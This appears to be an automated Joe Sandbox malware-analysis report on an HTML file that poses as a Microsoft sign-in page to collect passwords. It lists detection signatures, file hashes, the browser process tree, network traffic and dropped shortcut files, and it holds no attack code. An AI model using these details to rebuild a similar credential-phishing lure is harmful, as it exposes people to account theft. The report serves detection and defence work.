Edit tour

Windows Analysis Report
Gpchev PaidRemit.Htm

Overview

General Information

Sample Name:	Gpchev PaidRemit.Htm
Analysis ID:	1331551
MD5:	18f5900dfb9fe5ee8b583a4e4f066e87
SHA1:	593a9883831faefab932765fb2d0c2b39fd82c1d
SHA256:	cdd0aede589a2916bda2ccb882f9717774870cf610aec3ce68d3e7f657c4c2b8

Detection

HTMLPhisher

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Phishing site detected (based on favicon image match)

Yara detected HtmlPhish10

Detected javascript redirector / loader

HTML file submission containing password form

Suspicious Javascript code found in HTML file

HTML document with suspicious title

HTML Script injector detected

HTML document with suspicious name

Phishing site detected (based on image similarity)

Invalid 'forgot password' link found

Creates files inside the system directory

None HTTPS page querying sensitive user data (password, username or email)

Stores files to the Windows start menu directory

HTML body contains password input but no form action

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 6180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Gpchev PaidRemit.Htm MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5480 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2036,i,14847834638096593087,13723219104482565680,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
1.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Phishing site detected (based on favicon image match)

Source: file://

Matcher: Template: microsoft matched with high similarity

Yara detected HtmlPhish10

Source: Yara match

File source: 1.0.pages.csv, type: HTML

Detected javascript redirector / loader

Source: Gpchev PaidRemit.Htm

HTTP Parser: Low number of body elements: 0

Suspicious Javascript code found in HTML file

Source: Gpchev PaidRemit.Htm

HTTP Parser: document.write

HTML document with suspicious title

Source: file:///C:/Users/user/Desktop/Gpchev%20PaidRemit.Htm?websrc=paxwPEIJbmeer8zadbbb9RLvcBJ3Mxhwn3pR5rqUJQr0Lu1Jo0FJ7wmE6JPSC4SDLb2uaukO23CX72sYKKwgW5JaJqdpkC4FSHi2H9jZurspijkEDBrmfPTDAzmUhjkb3P5rtgY5FrhDBtzGT7k1qtjvtjC7jQJ4ouk5oUQ6q4UtGJk85psNMNwQxj4m8EIoiyysBhQOAdPy6fpPiAstrXzddHXcJIKSPPWHqscKhDbqD6e2bvhPJDp9L5xMGC6XwPOOPOUJVOfhau0pB0ayKkaJ23t1kqWj2EgP6uxaeGLocw&dispatch=240&id=485807

Tab title: Sign in to your Microsoft account

HTML Script injector detected

HTTP Parser: New script tag found

Phishing site detected (based on image similarity)

Matcher: Found strong image similarity, brand: MICROSOFT

HTTP Parser: Invalid link: Forgot password?

HTTP Parser: Has password / email / username input fields

HTTP Parser: <input type="password" .../> found but no <form action="...

HTTP Parser: <input type="password" .../> found

HTTP Parser: No <meta name="author".. found

Source: Gpchev PaidRemit.Htm	HTTP Parser: No favicon
Source: Gpchev PaidRemit.Htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Gpchev%20PaidRemit.Htm?websrc=paxwPEIJbmeer8zadbbb9RLvcBJ3Mxhwn3pR5rqUJQr0Lu1Jo0FJ7wmE6JPSC4SDLb2uaukO23CX72sYKKwgW5JaJqdpkC4FSHi2H9jZurspijkEDBrmfPTDAzmUhjkb3P5rtgY5FrhDBtzGT7k1qtjvtjC7jQJ4ouk5oUQ6q4UtGJk85psNMNwQxj4m8EIoiyysBhQOAdPy6fpPiAstrXzddHXcJIKSPPWHqscKhDbqD6e2bvhPJDp9L5xMGC6XwPOOPOUJVOfhau0pB0ayKkaJ23t1kqWj2EgP6uxaeGLocw&dispatch=240&id=485807	HTTP Parser: No favicon

HTTP Parser: No <meta name="copyright".. found

Source: unknown

HTTPS traffic detected: 23.1.237.25:443 -> 192.168.2.16:49750 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49755 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 26MB

Source: unknown

HTTPS traffic detected: 23.1.237.25:443 -> 192.168.2.16:49750 version: TLS 1.0

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknown	TCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknown	TCP traffic detected without corresponding DNS query: 209.197.3.8

Source: unknown

DNS traffic detected: queries for: clients2.google.com

Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49755 version: TLS 1.2

System Summary

HTML document with suspicious name

Source: Name includes: Gpchev PaidRemit.Htm

Initial sample: remit

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\chrome_BITS_6180_797614257

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Gpchev PaidRemit.Htm
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2036,i,14847834638096593087,13723219104482565680,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2036,i,14847834638096593087,13723219104482565680,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: classification engine

Classification label: mal84.phis.winHTM@14/34@18/153

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Stealing of Sensitive Information

HTML file submission containing password form

HTTP Parser: file:///C:/Users/user/Desktop/Gpchev%20PaidRemit.Htm?websrc=paxwPEIJbmeer8zadbbb9RLvcBJ3Mxhwn3pR5rqUJQr0Lu1Jo0FJ7wmE6JPSC4SDLb2uaukO23CX72sYKKwgW5JaJqdpkC4FSHi2H9jZurspijkEDBrmfPTDAzmUhjkb3P5rtgY5FrhDBtzGT7k1qtjvtjC7jQJ4ouk5oUQ6q4UtGJk85psNMNwQxj4m8EIoiyysBhQOAdPy6fpPiAstrXzddHXcJIKSPPWHqscKhDbqD6e2bvhPJDp9L5xMGC6XwPOOPOUJVOfhau0pB0ayKkaJ23t1kqWj2EgP6uxaeGLocw&dispatch=240&id=485807

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	11 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 Extra Window Memory Injection	1 Extra Window Memory Injection	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Name	IP	Active	Malicious	Reputation
jsdelivr.map.fastly.net	151.101.1.229	true	false	unknown
accounts.google.com	172.253.63.84	true	false	high
offline-web.vercel.app	76.76.21.22	true	false	unknown
part-0012.t-0009.fb-t-msedge.net	13.107.226.40	true	false	unknown
cdnjs.cloudflare.com	104.17.24.14	true	false	high
www.google.com	172.253.63.99	true	false	high
clients.l.google.com	172.253.115.101	true	false	high
clients1.google.com	unknown	unknown	false	high
clients2.google.com	unknown	unknown	false	high
secure.aadcdn.microsoftonline-p.com	unknown	unknown	false	unknown
cdn.jsdelivr.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
file:///C:/Users/user/Desktop/Gpchev%20PaidRemit.Htm?websrc=paxwPEIJbmeer8zadbbb9RLvcBJ3Mxhwn3pR5rqUJQr0Lu1Jo0FJ7wmE6JPSC4SDLb2uaukO23CX72sYKKwgW5JaJqdpkC4FSHi2H9jZurspijkEDBrmfPTDAzmUhjkb3P5rtgY5FrhDBtzGT7k1qtjvtjC7jQJ4ouk5oUQ6q4UtGJk85psNMNwQxj4m8EIoiyysBhQOAdPy6fpPiAstrXzddHXcJIKSPPWHqscKhDbqD6e2bvhPJDp9L5xMGC6XwPOOPOUJVOfhau0pB0ayKkaJ23t1kqWj2EgP6uxaeGLocw&dispatch=240&id=485807	false		low

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
151.101.1.229	jsdelivr.map.fastly.net	United States	54113	FASTLYUS	false
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
142.250.31.101	unknown	United States	15169	GOOGLEUS	false
172.253.63.84	accounts.google.com	United States	15169	GOOGLEUS	false
13.107.226.40	part-0012.t-0009.fb-t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.253.63.94	unknown	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.253.63.99	www.google.com	United States	15169	GOOGLEUS	false
172.253.115.101	clients.l.google.com	United States	15169	GOOGLEUS	false
104.127.78.253	unknown	United States	20940	AKAMAI-ASN1EU	false
142.251.16.94	unknown	United States	15169	GOOGLEUS	false
76.76.21.22	offline-web.vercel.app	United States	16509	AMAZON-02US	false

Private

IP
192.168.2.16

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1331551
Start date and time:	2023-10-24 23:57:32 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Sample file name:	Gpchev PaidRemit.Htm
Detection:	MAL
Classification:	mal84.phis.winHTM@14/34@18/153
Cookbook Comments:	Found application associated with file extension: .Htm

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 142.251.16.94, 34.104.35.123, 104.127.78.253, 192.229.211.108, 8.249.245.254
Excluded domains from analysis (whitelisted): logincdn.msauth.net, lgincdnmsftuswe2.azureedge.net, slscr.update.microsoft.com, secure.aadcdn.microsoftonline-p.com.edgekey.net, ctldl.windowsupdate.com, clientservices.googleapis.com, firstparty-azurefd-prod.trafficmanager.net, edgedl.me.gvt1.com, ocsp.digicert.com, lgincdn.trafficmanager.net, e13761.dscg.akamaiedge.net, lgincdnmsftuswe2.afd.azureedge.net, global-entry-afdthirdparty-fallback.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: Gpchev PaidRemit.Htm

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 24 20:58:06 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.983539146662844
Encrypted:	false
SSDEEP:
MD5:	9CD4B18649019CA7C79689D34C184516
SHA1:	DF726029F7478B6B23D829AE498595E9C64355C8
SHA-256:	E0098F8FC8A765522AB756EB230277595545FDCD1A7A497A63238D3243E6E98A
SHA-512:	8EB500EDCA433E13C8C3F1A56B15F1B8CC5594C46F77411F89913DC71A4941103B211B9069B8A9C74ECCBAAEB5CDB80EBC2B381FE48561430C9920B0A31A584D
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....ur+....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXW8.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXWB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXWB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXWB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXWD............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........).E......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 24 20:58:06 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	4.000290346022558
Encrypted:	false
SSDEEP:
MD5:	083F99342439BFEA4A8DC1A691AC9166
SHA1:	13B29322D5E0117ADF0D371B705A743C4F5C7B1E
SHA-256:	637E0256166C2A9934C79EA0A5D001A7586ACAD53756C2F6B6CC42B2721E8989
SHA-512:	6A35FD36F88BDACFF2C16D9B4052EF8ABD02337CE39720E369D5A579BFC576747E19DEF9CF7D29DF969E5840AEC76A645F45CD5E7AF970C406792CCEAC3C5088
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....oQ^+....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXW8.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXWB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXWB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXWB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXWD............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........).E......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.008076847878023
Encrypted:	false
SSDEEP:
MD5:	8F914EC07F2437604D411744D8842220
SHA1:	4FA28C7ECBD7723E2CFCD3900AF932742F48312F
SHA-256:	3B416CD86907A3A8CD3A9FB469FE89C616B8BD66A7B8739127C2AB7620C04DCD
SHA-512:	A6BEF3E466F9B3D87A7FD9300AB5118405272930484811EC5A7C1CCB84D802FA158800547EF820E776C7441CF2684D5804AC9E456771B2B87A8F80B8C0CDEBE3
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXW8.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXWB.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXWB.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXWB............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........).E......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 24 20:58:06 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.999199929908787
Encrypted:	false
SSDEEP:
MD5:	2CC41DFCB7CA40B8692DDBB639A1A269
SHA1:	2B54BD9B8A62B3826007A97B956E1267C9B88086
SHA-256:	5066BDE4F41FF2A8AF66E5A5BD4C18136C44500F9BA5E3D937AB572CA6C13773
SHA-512:	6239C2716CBBE45C3D5B0DB15525AA89C7584A98427B3CE34624F0DA24A912071F0643A271E65ECF649E46D3941613E6358B888D207FD7F48AD23001731D5111
Malicious:	false
Reputation:	low
